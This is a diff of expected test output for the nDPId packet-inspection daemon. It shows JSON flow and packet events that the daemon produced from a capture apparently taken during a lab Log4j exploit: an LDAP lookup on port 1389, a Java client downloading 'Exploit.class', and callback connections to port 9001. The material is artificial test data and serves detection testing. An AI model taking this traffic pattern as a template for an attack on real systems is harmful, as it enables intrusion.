-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":426,"packets-processed":422,"total-skipped-flows":0,"total-l4-data-len":5830,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1639425834697} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 426/422 diff --git a/test/results/long_tls_certificate.pcap.out b/test/results/long_tls_certificate.pcap.out index e3de4817e..ba9c3bfaa 100644 --- a/test/results/long_tls_certificate.pcap.out +++ b/test/results/long_tls_certificate.pcap.out @@ -1,13 +1,13 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"long_tls_certificate.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1609756181300} 